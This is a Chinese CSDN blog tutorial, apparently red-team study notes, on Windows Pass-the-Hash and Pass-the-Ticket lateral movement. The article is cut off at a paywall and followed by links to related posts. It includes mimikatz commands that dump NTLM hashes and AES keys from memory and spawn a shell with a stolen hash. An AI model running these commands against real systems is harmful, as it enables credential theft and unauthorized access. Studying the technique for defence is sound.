【内网学习笔记】21、哈希传递与票据传递

最新推荐文章于 2022-12-08 17:21:21 发布
最新推荐文章于 2022-12-08 17:21:21 发布
阅读量2.2k 收藏 3
点赞数 2
分类专栏: 内网学习笔记 文章标签: 内网安全 红队 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37683287/article/details/120042823
版权
本文详细介绍了Windows内网渗透中的哈希传递(Pass The Hash, PTH)和票据传递(Pass The Ticket, PTT)技术。内容包括NTLM Hash的获取与使用,以及通过mimikatz和kekeo工具进行票据的导出、导入与传递。文中还提到了相关安全补丁KB2871997的作用,并强调了票据传递的一些关键注意事项。" 126133601,8072925,大屏项目开发与自适应策略,"['前端开发', 'Vue', 'CSS', '适配', 'rem']
摘要由CSDN通过智能技术生成

1、哈希传递

哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式。

通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Windows Server 2012 R2及之后版本的操作系统中,默认不会在内存中保存明文密码,Mimikatz 就读不到密码明文,因此此时往往会使用工具将哈希值传递到其他计算机中进行登录验证。

NTLM Hash

在目标主机上使用 mimikatz 获取 NTLM Hash

privilege::debug
sekurlsa::logonpasswords

在远程主机上以管理员权限打开 mimikatz

privilege::debug
sekurlsa::pth /user:administrator /domain:teamssix.com /ntlm:161cff084477fe596a5db81874498a24

mimikatz 执行后,会弹出一个拥有对应 Hash 用户权限的 CMD 窗口。

AES-256 密钥

使用 mimikatz 抓取密钥

privilege::debug
sekurlsa::ekeys

在其他远程计算机中,以管理员权限打开 mimikatz

privilege::debug
sekurlsa::pth /use
最低0.47元/天 解锁文章
TeamsSix
关注
专栏目录
内网学习笔记】29、白银票据
TeamsSix 的 CSDN 空间
10-09 2086
0、前言 白银票据(Sliver Ticket) 不同于黄金票据(Golden Ticket) Kerberos 协议详解:https://teamssix.com/210923-151418.html 白银票据不与密钥分发中心 KDC 交互,因此没有了 Kerberos 认证协议里的前 4 步,通过伪造的票据授予服务 TGS 生成伪造的服务票据 ST 直接与服务器 Server 进行交互。 白银票据与黄金票据的区别: 1、白银票据不经过 KDC,因此白银票据日志相对于黄金票据会更少,同时白银票据的日
内网学习笔记】22、PsExec 和 WMI 的使用
TeamsSix 的 CSDN 空间
09-02 750
1、PsExec PsExec.exe PsExec 在之前的文章里提到过一次,参见https://teamssix.com/210802-181052.html,今天来着重学习一下。 PsExec 是 PSTools 工具包里的一部分,其下载地址为:https://download.sysinternals.com/files/PSTools.zip 利用 PsExec 可以在远程计算机上执行命令,其基本原理是通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘中生成一个名为 PSEXESV
内网横向移动之票据传递哈希传递
qq_52074678的博客
06-21 513
内网横向移动
[内网渗透]—票据传递
最新发布
Sentiment的博客
12-08 891
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
PTT(pass the ticket)票据传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
11-03 2189
PTT票据传递攻击,(PTT)是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PTH基于NTLM认证进行攻击,而PTT基于kerberos协议进行攻击票据传递攻击,目的是伪造、窃取凭据提升权限。
票据传递攻击与防范
weixin_45007073的博客
07-11 848
票据传递前言使用mimikatz进行票据传递 前言 之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。 使用mimikatz进行票据传递 我们首先使用mimikatz将内存中的票据导出。执行完以上命令后,会在当前目录下出现多个服务的票据文件,如krbtgt、cifs、ldap mim
PHP的password_hash()使用实例
Just Code
10-23 987
一、前言PHP5.5 (PHP 5 >= 5.5.0) 提供了许多新特性及Api函数,其中之一就是Password Hashing API(创建和校验哈希密码)。它包含4个函数:password_get_info()、password_hash()、password_needs_rehash()、password_verify()。 在PHP5.5之前,我们对于密码的加密可能更多的是采...
内网学习笔记】30、跨域安全(完结)
TeamsSix 的 CSDN 空间
10-22 3557
0、前言 常见的跨域攻击方法有以下几种: i、利用常规的渗透方法,比如 Web 漏洞 ii、利用已知散列值进行哈希传递票据传递,因为有可能域内的密码是通用的 iii、利用域信任关系 这里主要看第三种:域信任关系 当有多个域时,不同的域之间想进行资源共享,就需要用到域信任,只有当域之间互相信任后,才能进行资源共享。 域信任关系可分为单向信任和双向信任。单向信任即 A 信任 B,但 B 不信任 A,双向信任同理。在创建子域时,系统会在新的子域和父域之间自动创建双向可传递信任关系。 域信任关系又可分为内部信任和
内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
闵行小鱼塘
04-19 2908
本篇继续阅读学习内网安全攻防:渗透测试实战指南》,本章是跨域攻击分析及防御,对利用域信任关系实现跨域攻击的典型方法进行了分析,并对如何部署安全内网生产环境给出了建议,内容非常简短
内网渗透 - 哈希传递攻击
LuckySec
06-06 2469
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
Pass The Hash攻击原理
m0_58606546的博客
11-20 640
验证的整个过程中缺少了一样重要的东西,也就是在故事背景中埋下过的一个小伏笔:windows本身不存储明文密码。 ***PTH原理*** 根据结果逆推:如果需要正确的response(蓝色)来通过认证,因为response本质上也是Net NTLM Hash(红色)根据公式“Net NTLM Hash = NTLM Hash(Challenge)”,我们需要正确的NTLM Hash(黄色)和Challenge(绿色)。而由于Challenge是服务端发送给,只要我们拥有正确的NTLM Hash,即可通过认
负载均衡 ip_hash
zhangchen的博客
04-15 9950
负载均衡 ip_hash
什么是HashMap?
热门推荐
酒吧七的博客
05-22 4万+
接下来写的内容是看过众多大神的文章后,自己总结的一些心得体会,主要是为了让大家快速理解HashMap,应付面试百分百足矣。当然讲HashMap之前必须先讲一些必备知识(等你回答完面试官问题,再深入问下去的时候,这些知识可以防止露馅):map的定义首先你要知道什么是map,map就是用于存储键值对(<key,value>)的集合类,也可以说是一组键值对的映射(数学概念)。注意,我这里说的...
7、域渗透——Pass The Hash的实现
Fly_鹏程万里
06-11 2212
0x00 前言在之前的文章《域渗透——Pass The Hash & Pass The Key》曾介绍过kb2871997对Pass The Hash的影响。本文将站在另一个角度,介绍Pass The Hash的相关实现0x01 简介本文将要介绍以下内容:Pass The Hash的原理常用工具mimikatz中的Pass The Hashmimikatz中的Pass The Ticket...
PHP 密码哈希password_hash的使用方法
郎涯技术
12-18 5689
每个人在建构 PHP 应用时终究都会加入用户登录的模块。用户的帐号及密码会被储存在数据库中,在登录时用来验证用户。 在存储密码前正确的 哈希密码 是非常重要的。哈希密码是单向不可逆的,该哈希值是一段固定长度的字符串且无法逆向推算出原始密码。这就代表你可以哈希另一串密码,来比较两者是否是同一个密码,但又无需知道原始的密码。如果你不将密码哈希,那么当未授权的第三者进入你的数据库时,所有用户的帐号资料将...
哈希传递-PTH与票据传递-PTT
Armandhe的博客
07-21 628
hash传递票据传递,简直就是6666666
世界上最快的密码破解工具oclHashcat
jason的专栏
05-25 1509
oclHashcat是一个基于GPU的Hash密码破解工具,号称世界最快。 产品特性 世界最快 完全免费 世界上第一个基于GPGPU规则引擎 多GPI、多系统支持 支持算法 MD4 MD5 SHA1 SHA-256 SHA-512 SHA-3 (Keccak) RipeMD160 Whirlpool GOST R 34.11-94 HMAC-MD5
Spring Boot + Java爬虫 + 部署到Linux(六、后端Controller实现、下载文件以及登录验证拦截器)
gg_yangliyang的博客
06-30 2006
Controller就是控制层,就是mvc模式里面的c。控制前端页面的显示,以及向前端传递一些数据。这个就随便设置吧,没什么通用性。由于这个项目只有一个业务,所以主要界面也就一个,叫index。对应的Controller如下:import java.net.InetAddress; import java.net.UnknownHostException; import javax.servle...
域渗透-凭据传递攻击(pass the hash)完全总结
weixin_30886233的博客
08-18 1254
总结下PtH具体形式(wmicexec、powershell、msf等) 0x01PtH攻击原理 &&黄金白银票据 PtH攻击原理 wikihttps://en.wikipedia.org/wiki/Pass_the_hash写的也很清楚 其中重要的是windows使用系统API(LsaLogonUser)生成...
算法学习笔记哈希表与JAVA String操作
作者在2021年11月21日开始使用‘东哥的算法小抄’作为学习资料,并记录了读书笔记笔记详细列举了哈希表和Java String类的一些关键方法和示例代码,旨在帮助读者理解和应用这些概念。" **哈希表(unordered_map)*...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值